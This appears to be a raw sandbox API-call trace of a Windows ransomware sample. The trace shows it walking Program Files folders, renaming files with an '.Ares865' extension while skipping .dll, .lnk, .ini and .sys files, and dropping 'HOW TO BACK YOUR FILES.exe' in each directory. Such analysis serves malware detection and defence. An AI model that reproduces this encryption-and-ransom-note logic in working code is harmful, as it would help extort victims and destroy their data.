[0123.105] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.105] CloseHandle (hObject=0x120) returned 1 [0123.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.105] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Uninstall Information\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52272ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.106] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.106] lstrcpyW (in: lpString1=0x2cce45a, lpString2="bookingsabstractsrendering.exe" | out: lpString1="bookingsabstractsrendering.exe") returned="bookingsabstractsrendering.exe" [0123.106] lstrlenW (lpString="bookingsabstractsrendering.exe") returned 30 [0123.106] lstrlenW (lpString="Ares865") returned 7 [0123.106] lstrcmpiW (lpString1="ing.exe", lpString2="Ares865") returned 1 [0123.106] lstrlenW (lpString=".dll") returned 4 [0123.106] lstrcmpiW (lpString1="bookingsabstractsrendering.exe", lpString2=".dll") returned 1 [0123.106] lstrlenW (lpString=".lnk") returned 4 [0123.106] lstrcmpiW (lpString1="bookingsabstractsrendering.exe", lpString2=".lnk") returned 1 [0123.106] lstrlenW (lpString=".ini") returned 4 [0123.106] lstrcmpiW (lpString1="bookingsabstractsrendering.exe", lpString2=".ini") returned 1 [0123.106] lstrlenW (lpString=".sys") returned 4 [0123.106] lstrcmpiW (lpString1="bookingsabstractsrendering.exe", lpString2=".sys") returned 1 [0123.106] lstrlenW (lpString="bookingsabstractsrendering.exe") returned 30 [0123.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe.Ares865") returned 83 [0123.107] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe" (normalized: "c:\\program files (x86)\\uninstall information\\bookingsabstractsrendering.exe"), lpNewFileName="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\bookingsabstractsrendering.exe.ares865"), dwFlags=0x1) returned 1 [0123.108] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\bookingsabstractsrendering.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0123.108] GetLastError () returned 0x20 [0123.108] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe CreateFile error 32\r\n") returned 105 [0123.108] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe CreateFile error 32\r\n") returned 105 [0123.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0123.109] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa563 [0123.109] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x69, lpOverlapped=0x0) returned 1 [0123.110] CloseHandle (hObject=0x118) returned 1 [0123.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\bookingsabstractsrendering.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Uninstall Information\\bookingsabstractsrendering.exe" (normalized: "c:\\program files (x86)\\uninstall information\\bookingsabstractsrendering.exe"), dwFlags=0x1) returned 1 [0123.111] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0123.111] CloseHandle (hObject=0x0) returned 0 [0123.111] CloseHandle (hObject=0xffffffff) returned 0 [0123.111] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52272ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0123.111] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0123.111] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf090e460, ftCreationTime.dwHighDateTime=0x1d4e7a3, ftLastAccessTime.dwLowDateTime=0xd562420, ftLastAccessTime.dwHighDateTime=0x1d52a7f, ftLastWriteTime.dwLowDateTime=0xd562420, ftLastWriteTime.dwHighDateTime=0x1d52a7f, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="manhattan-graphical-singer.exe", cAlternateFileName="MANHAT~1.EXE")) returned 1 [0123.111] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.111] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2="aoldtz.exe") returned 1 [0123.111] lstrcpyW (in: lpString1=0x2cce45a, lpString2="manhattan-graphical-singer.exe" | out: lpString1="manhattan-graphical-singer.exe") returned="manhattan-graphical-singer.exe" [0123.111] lstrlenW (lpString="manhattan-graphical-singer.exe") returned 30 [0123.112] lstrlenW (lpString="Ares865") returned 7 [0123.112] lstrcmpiW (lpString1="ger.exe", lpString2="Ares865") returned 1 [0123.112] lstrlenW (lpString=".dll") returned 4 [0123.112] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2=".dll") returned 1 [0123.112] lstrlenW (lpString=".lnk") returned 4 [0123.112] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2=".lnk") returned 1 [0123.112] lstrlenW (lpString=".ini") returned 4 [0123.112] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2=".ini") returned 1 [0123.112] lstrlenW (lpString=".sys") returned 4 [0123.112] lstrcmpiW (lpString1="manhattan-graphical-singer.exe", lpString2=".sys") returned 1 [0123.112] lstrlenW (lpString="manhattan-graphical-singer.exe") returned 30 [0123.112] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe.Ares865") returned 83 [0123.112] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe" (normalized: "c:\\program files (x86)\\uninstall information\\manhattan-graphical-singer.exe"), lpNewFileName="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\manhattan-graphical-singer.exe.ares865"), dwFlags=0x1) returned 1 [0123.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\manhattan-graphical-singer.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0123.114] GetLastError () returned 0x20 [0123.114] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe CreateFile error 32\r\n") returned 105 [0123.114] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe CreateFile error 32\r\n") returned 105 [0123.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0123.114] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa5cc [0123.114] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x69, lpOverlapped=0x0) returned 1 [0123.115] CloseHandle (hObject=0x118) returned 1 [0123.115] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe.Ares865" (normalized: "c:\\program files (x86)\\uninstall information\\manhattan-graphical-singer.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Uninstall Information\\manhattan-graphical-singer.exe" (normalized: "c:\\program files (x86)\\uninstall information\\manhattan-graphical-singer.exe"), dwFlags=0x1) returned 1 [0123.115] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0123.115] CloseHandle (hObject=0x0) returned 0 [0123.115] CloseHandle (hObject=0xffffffff) returned 0 [0123.115] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf090e460, ftCreationTime.dwHighDateTime=0x1d4e7a3, ftLastAccessTime.dwLowDateTime=0xd562420, ftLastAccessTime.dwHighDateTime=0x1d52a7f, ftLastWriteTime.dwLowDateTime=0xd562420, ftLastWriteTime.dwHighDateTime=0x1d52a7f, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="manhattan-graphical-singer.exe", cAlternateFileName="MANHAT~1.EXE")) returned 0 [0123.116] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.116] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0123.116] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies") returned="C:\\Program Files (x86)\\Reference Assemblies" [0123.116] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies") returned="C:\\Program Files (x86)\\Reference Assemblies" [0123.116] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.116] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.117] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.117] GetLastError () returned 0x0 [0123.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.117] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.117] CloseHandle (hObject=0x120) returned 1 [0123.118] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.118] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.118] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.118] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.118] lstrcpyW (in: lpString1=0x2cce458, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0123.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0123.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2e4710 [0123.118] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0123.118] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0123.118] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.118] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0123.118] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft" [0123.119] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft" [0123.119] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.119] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.119] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.120] GetLastError () returned 0x0 [0123.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.120] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.120] CloseHandle (hObject=0x120) returned 1 [0123.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.120] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.120] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.120] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.121] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Framework" | out: lpString1="Framework") returned="Framework" [0123.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0123.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0123.121] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0123.121] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52299040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0123.121] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0123.121] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52299040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0123.121] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.121] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0123.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework" [0123.121] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework" [0123.122] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.122] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.123] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.123] GetLastError () returned 0x0 [0123.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.123] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.123] CloseHandle (hObject=0x120) returned 1 [0123.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.123] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.124] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.124] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.124] lstrcpyW (in: lpString1=0x2cce480, lpString2="v3.0" | out: lpString1="v3.0") returned="v3.0" [0123.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0123.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x336fc8 [0123.124] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0123.124] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0123.124] lstrcmpiW (lpString1="v3.5", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.124] lstrcmpiW (lpString1="v3.5", lpString2="aoldtz.exe") returned 1 [0123.124] lstrcpyW (in: lpString1=0x2cce480, lpString2="v3.5" | out: lpString1="v3.5") returned="v3.5" [0123.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0123.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x337060 [0123.124] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0123.124] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52299040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0123.124] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.124] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0123.124] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0123.125] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5" [0123.125] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.125] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.126] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.126] GetLastError () returned 0x0 [0123.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.126] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.126] CloseHandle (hObject=0x120) returned 1 [0123.126] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.127] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52299040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 